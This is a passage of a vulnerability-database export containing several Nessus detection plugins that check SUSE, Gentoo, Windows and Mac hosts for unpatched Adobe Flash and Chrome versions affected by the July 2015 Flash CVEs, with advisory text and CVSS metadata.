value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"i386|i486|i586|i686|x86_64\") audit(AUDIT_ARCH_NOT, \"i386 / i486 / i586 / i686 / x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED11\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"flash-player-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"flash-player-gnome-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"4\", cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"x86_64\", reference:\"flash-player-kde4-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"flash-player-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", 
reference:\"flash-player-gnome-11.2.202.481-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:\"3\", cpu:\"i586\", reference:\"flash-player-kde4-11.2.202.481-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:01:27", "description": "The version of Google Chrome installed on the remote Windows host is prior to 43.0.2357.132. It is, therefore, affected by multiple vulnerabilities in the bundled version of Adobe Flash :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. 
(CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. (CVE-2015-5124)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-10T00:00:00", "type": "nessus", "title": "Google Chrome < 43.0.2357.132 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3097", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119", "CVE-2015-5124"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_43_0_2357_132.NASL", "href": "https://www.tenable.com/plugins/nessus/84667", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84667);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n 
\"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Google Chrome < 43.0.2357.132 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 43.0.2357.132. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Adobe Flash :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. 
(CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.ca/2015/07/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e87f6dbb\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 43.0.2357.132 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'43.0.2357.132', severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:19:28", "description": "The version of Google Chrome installed on the remote Mac OS X host is prior to 43.0.2357.132. It is, therefore, affected by multiple vulnerabilities in the bundled version of Adobe Flash :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. 
(CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. 
(CVE-2015-5124)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-10T00:00:00", "type": "nessus", "title": "Google Chrome < 43.0.2357.132 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3097", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119", "CVE-2015-5124"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_43_0_2357_132.NASL", "href": "https://www.tenable.com/plugins/nessus/84668", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84668);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n 
\"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Google Chrome < 43.0.2357.132 Multiple Vulnerabilities (Mac OS X)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 43.0.2357.132. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Adobe Flash :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. 
(CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.ca/2015/07/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e87f6dbb\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 43.0.2357.132 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'43.0.2357.132', severity:SECURITY_HOLE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-23T15:04:56", "description": "The remote host is affected by the vulnerability described in GLSA-201507-13 (Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2015-09-23T00:00:00", "type": "nessus", "title": "GLSA-201507-13 : Adobe Flash Player: Multiple vulnerabilities (Underminer)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3113", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", 
"CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119"], "modified": "2022-04-22T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:adobe-flash", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201507-13.NASL", "href": "https://www.tenable.com/plugins/nessus/86083", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201507-13.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86083);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3113\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\"\n );\n script_xref(name:\"GLSA\", value:\"201507-13\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"GLSA-201507-13 : Adobe Flash Player: Multiple vulnerabilities (Underminer)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by the vulnerability described in GLSA-201507-13\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass 
\"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe Flash Player <= 18.0.0.194 Multiple Vulnerabilities (APSB15-16)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows host\nis equal or prior to version 18.0.0.194. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. 
(CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 18.0.0.203 